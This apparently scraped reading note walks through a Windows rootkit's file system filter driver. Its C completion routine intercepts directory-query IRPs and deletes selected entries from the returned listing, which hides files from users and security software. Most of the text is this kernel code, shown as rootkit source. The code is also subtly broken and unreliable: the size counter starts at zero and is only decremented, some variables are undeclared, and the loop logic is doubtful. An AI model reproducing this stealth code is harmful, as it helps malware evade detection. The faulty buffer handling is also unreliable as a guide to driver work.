Reading Note: Rootkit Technology: File Filter Driver (2)

Source: Internet
Author: User

The first part described how to hook the disk drive's file system driver. The following describes how the filter uses its dispatch routine to filter file operations.

A standard dispatch routine looks like this:

    NTSTATUS OurFilterDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
    {
        PIO_STACK_LOCATION currentIrpStack;
        ...
        currentIrpStack = IoGetCurrentIrpStackLocation(Irp);
        ...
        // Hand the lower driver a copy of our stack location, so it sees the same parameters.
        IoCopyCurrentIrpStackLocationToNext(Irp);

The following is the most important part of the dispatch routine: the I/O completion routine is set here. Once the underlying driver finishes processing the IRP, it calls this routine, and all filtering takes place in the completion routine.

        // Invoke OurFilterHookDone on success and on error, but not on cancel (TRUE, TRUE, FALSE).
        IoSetCompletionRoutine(Irp, OurFilterHookDone, NULL, TRUE, TRUE, FALSE);
        // Forward the IRP to the hooked file system driver.
        return IoCallDriver(hookExt->FileSystem, Irp);
    }

The following is the most important routine: the completion routine. As mentioned above, all of the filtering is implemented here.

    NTSTATUS OurFilterHookDone(IN PDEVICE_OBJECT DeviceObject,
                               IN PIRP Irp,
                               IN PVOID Context)
    {
        ...
        IrpSp = IoGetCurrentIrpStackLocation(Irp);

Check that this is a directory query and that we are running at PASSIVE_LEVEL:

        if (IrpSp->MajorFunction == IRP_MJ_DIRECTORY_CONTROL
            && IrpSp->MinorFunction == IRP_MN_QUERY_DIRECTORY
            && KeGetCurrentIrql() == PASSIVE_LEVEL
            && IrpSp->Parameters.QueryDirectory.FileInformationClass == FileBothDirectoryInformation
           )
        {
            PFILE_BOTH_DIR_INFORMATION volatile QueryBuffer = NULL;
            PFILE_BOTH_DIR_INFORMATION volatile NextBuffer = NULL;
            ULONG bufferLength;
            DWORD total_size = 0;       // byte count to report back after entries are removed
            BOOLEAN hide_me = FALSE;
            BOOLEAN reset = FALSE;
            ULONG size = 0;
            ULONG iteration = 0;

            // The returned entries form a singly linked list inside the caller's buffer;
            // each FILE_BOTH_DIR_INFORMATION points to the next one through NextEntryOffset.
            QueryBuffer = (PFILE_BOTH_DIR_INFORMATION) Irp->UserBuffer;
            bufferLength = Irp->IoStatus.Information;

            if (bufferLength > 0)
            {
                do
                {
                    DbgPrint("filename: %ws\n", QueryBuffer->FileName);
                    ...

The rootkit examines the file name and decides whether to hide the file. The files to hide can be pre-configured and loaded into a list, or matched by substring (similar to the common prefix method: if a file name contains a given set of prefix characters or a specific extension, the file is hidden). Assume the file is to be hidden, so a flag is set:

                    hide_me = TRUE;

If the rootkit needs to hide a file, it must modify QueryBuffer to remove the corresponding entry. The entry has to be handled differently depending on whether it is the first, a middle, or the last item in the list.

                    if (hide_me && iteration == 0)
                    {

To hide the first file in the list, the following code runs and checks whether it is the only entry in the list:

                        if ((IrpSp->Flags == SL_RETURN_SINGLE_ENTRY) ||
                            (QueryBuffer->NextEntryOffset == 0))
                        {

If this entry is the only one in the list, the following code runs. It clears the query buffer and returns zero bytes.

                            RtlZeroMemory(QueryBuffer, sizeof(FILE_BOTH_DIR_INFORMATION));
                            total_size = 0;
                        }
                        else
                        {

If there are other entries after the first one, the following code runs. It fixes the total size to be returned and removes the entry by shifting the remaining entries down over it.

                            total_size -= QueryBuffer->NextEntryOffset;
                            temp = ExAllocatePool(PagedPool, total_size);
                            if (temp != NULL)
                            {
                                RtlCopyMemory(temp, ((PBYTE) QueryBuffer + QueryBuffer->NextEntryOffset), total_size);
                                RtlZeroMemory(QueryBuffer, total_size + QueryBuffer->NextEntryOffset);
                                RtlCopyMemory(QueryBuffer, temp, total_size);
                                ExFreePool(temp);
                            }

Set a flag to indicate that QueryBuffer has been rewritten (the current position now holds a different entry, so the cursor must not advance):

                            reset = TRUE;
                        }
                    }

                    else if ((iteration > 0) && (QueryBuffer->NextEntryOffset != 0) && (hide_me))
                    {

To hide an entry in the middle of the list, the following code runs. It removes the entry and fixes the size to be returned. (inputBuffer and temp are declared in the part of the routine the excerpt omits.)

                        // bytes from the entry after this one to the end of the returned data
                        size = ((PBYTE) inputBuffer + Irp->IoStatus.Information) - ((PBYTE) QueryBuffer + QueryBuffer->NextEntryOffset);
                        temp = ExAllocatePool(PagedPool, size);
                        if (temp != NULL)
                        {
                            RtlCopyMemory(temp, ((PBYTE) QueryBuffer + QueryBuffer->NextEntryOffset), size);
                            total_size -= QueryBuffer->NextEntryOffset;
                            RtlZeroMemory(QueryBuffer, size + QueryBuffer->NextEntryOffset);
                            RtlCopyMemory(QueryBuffer, temp, size);
                            ExFreePool(temp);
                        }

Set the reset flag, indicating that QueryBuffer has been rewritten:

                        reset = TRUE;
                    }
                    else if ((iteration > 0) && (QueryBuffer->NextEntryOffset == 0) && (hide_me))
                    {

To hide the last entry in the list, the following code runs. This is much easier, because the entry only needs to be unlinked from the end of the list. It is not treated as a reset of QueryBuffer.

                        // bytes occupied by this last entry
                        size = ((PBYTE) inputBuffer + Irp->IoStatus.Information) - (PBYTE) QueryBuffer;
                        // NextBuffer still points at the previous entry (see the loop tail), so
                        // clearing its link terminates the list before this entry
                        NextBuffer->NextEntryOffset = 0;
                        total_size -= size;
                    }

If the buffer was not rewritten (meaning the current entry has been dealt with), the rootkit moves on to the next entry:

                    iteration += 1;
                    if (!reset)
                    {
                        // remember the previous entry, then follow the link to the next one
                        NextBuffer = QueryBuffer;
                        QueryBuffer = (PFILE_BOTH_DIR_INFORMATION) ((PBYTE) QueryBuffer + QueryBuffer->NextEntryOffset);
                    }
                }
                while (QueryBuffer != NextBuffer);
            }

After processing is complete, the new total_size of QueryBuffer is set in the IRP:

            Irp->IoStatus.Information = total_size;
        }

When necessary, mark the IRP as pending:

        if (Irp->PendingReturned)
        {
            IoMarkIrpPending(Irp);
        }

Return the status:

        return Irp->IoStatus.Status;
    }

If the FastIo path is used, the code takes a different route. First, the FastIo dispatch table is initialized as a structure of function pointers:

    FAST_IO_DISPATCH OurFastIOHook = {
        sizeof(FAST_IO_DISPATCH),
        FilterFastIoCheckIfPossible,
        FilterFastIoRead,
        ....
    };

Each of these functions simply passes the call through to the real FastIo routine. In other words, no FastIo call is filtered, because querying file and directory listings is not implemented as a FastIo call.
